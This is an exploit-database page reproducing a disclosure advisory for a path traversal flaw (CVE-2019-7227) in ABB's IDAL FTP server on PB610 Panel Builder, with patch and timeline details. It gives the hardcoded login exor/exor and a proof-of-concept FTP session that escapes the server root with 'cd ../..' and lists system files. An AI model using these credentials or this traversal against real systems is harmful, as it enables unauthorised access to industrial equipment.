Exploitalert - Database of Exploits

ABB IDAL FTP Server Path Traversal

CVE	Category	Price	Severity
CVE-2019-7227	CWE-22	$500	Critical

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2019-06-28

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H	0.2565	0.9

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	Low	I	Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2019060157

ABB IDAL FTP Server Path Traversal

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability ======================================================================== Identifiers ----------- XL-19-008 CVE-2019-7227 ABBVU-IAMF-1902006 CVSS Score ---------- 7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) Affected vendor --------------- ABB (new.abb.com) Credit ------ Eldar Marcussen - xen1thLabs - Software Labs Vulnerability summary --------------------- The IDAL FTP server fails to ensure that directory change requests do not change to locations outside of the FTP servers root directory. An authenticated attacker can simply traverse outside the server root directory by changing the directory with "cd ..". Technical details ----------------- An authenticated attacker can traverse to arbitrary directories on the hard disk and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker. Proof of concept ---------------- ``` ftp> open localhost 22 Connected to WIN-542AQUCL4LD. 220 Welcome to IDAL FTP server. READY. User (WIN-542AQUCL4LD:(none)): exor 331 User name ok, need password. Password: 230 User successfully logged in. 550 CWD command failed. Directory not found. ftp> cd ../../../../../../../../../../../../../../../ 250 CWD command successful. ftp> dir 200 PORT command successful.ac 150 Opening ASCII mode data connection for LIST. drwxrwxrwx 1 0 0 0 Dec 11 05:45 $Recycle.Bin -rwxrwxrwx 1 0 0 24 Jun 10 2009 autoexec.bat drwxrwxrwx 1 0 0 0 Dec 11 16:41 Boot -r--r--r-- 1 0 0 383562 Jul 14 2009 bootmgr -r--r--r-- 1 0 0 8192 Dec 11 16:41 BOOTSECT.BAK -rw-rw-rw- 1 0 0 10 Jun 10 2009 config.sys drwxrwxrwx 1 0 0 0 Jul 14 2009 Documents and Settings -rw-rw-rw- 1 0 0 -1074274304 Dec 11 12:36 pagefile.sys drwxrwxrwx 1 0 0 0 Jul 14 2009 PerfLogs dr-xr-xr-x 1 0 0 0 Dec 11 11:42 Program Files drwxrwxrwx 1 0 0 0 Dec 11 12:36 ProgramData drwxrwxrwx 1 0 0 0 Dec 11 05:44 Recovery -rw-rw-rw- 1 0 0 213 Dec 11 07:23 setup.log drwxrwxrwx 1 0 0 0 Dec 11 12:26 System Volume Information dr-xr-xr-x 1 0 0 0 Dec 11 05:44 Users drwxrwxrwx 1 0 0 0 Dec 11 07:20 Windows 226 Transfer complete. ftp: 1009 bytes received in 0.01Seconds 100.90Kbytes/sec. ftp> ``` Affected systems ---------------- PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367 Solution -------- Apply the patches and instructions from vendor: - ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch Disclosure timeline ------------------- 04/02/2019 - Contacted ABB requesting disclosure coordination 05/02/2019 - Provided vulnerability details 05/06/2019 - Patch available 17/06/2019 - xen1thLabs public disclosure

Impressum